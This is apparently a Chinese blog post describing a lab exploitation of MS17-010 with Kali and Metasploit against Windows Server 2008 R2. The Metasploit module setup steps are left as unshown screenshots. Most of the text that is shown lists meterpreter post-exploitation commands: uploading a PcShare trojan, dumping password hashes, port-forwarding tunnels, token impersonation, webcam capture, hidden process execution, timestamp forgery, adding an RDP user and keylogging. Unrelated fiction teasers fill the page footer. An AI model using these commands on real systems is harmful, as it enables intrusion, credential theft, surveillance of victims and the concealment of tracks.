KaliMSF实验:MS17-010漏洞利用

一、获取目标主机(Windows Server 2008 R2)IP地址:

确保Kali和目的主机互通:


ping不同关闭目标机器防火墙

二、kali机运行MSF:

命令:msfconsole

三、查找漏洞利用模块:

四、使用模块,并设置目标信息及payload(有效载荷):

payload:可理解为要上传的木马。

设置TCP连接方式

五、使用模块进行攻击:

查看有效载荷提供的可执行命令:

部分截图

例:获取目标主机shell

六、后期攻击使用方法:

1、生成的木马文件并上传至Kali:

使用PcShare生成木马:运行PcShare,点击创建客户,IP地址填写运行PcShare程序的主机地址,生成文件后上传到Kali虚拟机英文目录下:



2、向目标主机上传木马文件

3、执行上传的木马文件

木马文件被执行,成功在目标主机上创建进程


通过工具栏各个功能模块可以对目标主机进行控制

命令1:文件下载:

命令:download -r  文件路径

下再目标主机桌面上的1.inf文件


下载成功

命令2:创建CMD新通道:

命令:execute -f cmd -c

创建成功

命令3:显示目标主机上的进程:

命令4:使用Hashdump转储所有hash值(破解目标主机用户密码)

输出的每一行内容格式如下:Username:       SID:LM           hash:NTLM hash

各个用户的HASH值

命令5:使用Credcollect转储hash

命令6::创建端口转发

meterpreter shell中的portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。

add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。

请注意:这个隧道存在于meterpreter控制台之外,任何终端会话都可以使用。

命令:portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

命令7:获取admin权限:

获取Windows系统最高权限(system)

命令8:删除端口转发记录:

跟创建端口转发命令类似,这条命令是删除一条端口转发记录

命令:portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>

如果你想显示所有端口转发记录,你可以使用portfwd list命令,如果你想删除所有的记录,可以使用portfwd flush命令

命令9:在目标主机上搜索文件

搜索命令可以来定位查找目标主机上的特定文件。这个命令可以搜索整个文件系统,也可以搜索特定的文件夹。

例如,如果你想搜索目标主机上的所有txt文件,可以使用下列命令:

命令:search -f *.txt

命令10:获取系统信息

sysinfo命令会显示系统名,操作系统,架构和语言等。

命令:sysinfo

命令11:模拟任意用户(token操作)

这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。

incognito最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit,并且最终集成到了meterpreter中,使用如下:

• 在meterpreter会话中加载这个模块非常简单,只要输入 use incognito命令即可;

use incognito

• 输入list_tokens -u来显示所有有效的tokens;

list_tokens -u

• 然后我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用getuid命令来检查当前用户ID。

impersonate_token “Machine\\user”

命令12:webcam摄像头命令

webcam_list  #查看摄像头

webcam_snap  #通过摄像头拍照

webcam_stream  #通过摄像头开启视频

命令13:execute执行文件

execute #在目标机中执行文件

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

获取目标主机SHELL

命令14timestomp伪造时间戳

timestomp C:// -h   #查看帮助

timestomp -v C://Users//Administrator//Desktop//1.inf    #查看1.inf的时间戳

timestomp -v C://Users//Administrator//Desktop//2.inf    #查看2.inf的时间戳

timestomp C://Users//Administrator//Desktop//1.inf -f C://Users//Administrator//Desktop//2.inf   #将1.inf的时间戳复制给2.inf

命令15:enable_rdp脚本开启3389

run post/windows/manage/enable_rdp   #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456   #添加用户

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令.

命令20:键盘记录

keyscan_start    #开始键盘记录

keyscan_dump      #导出记录数据

keyscan_stop    #结束键盘记录

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,496评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,407评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,632评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,180评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,198评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,165评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,052评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,910评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,324评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,542评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,711评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,424评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,017评论 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,668评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,823评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,722评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,611评论 2 353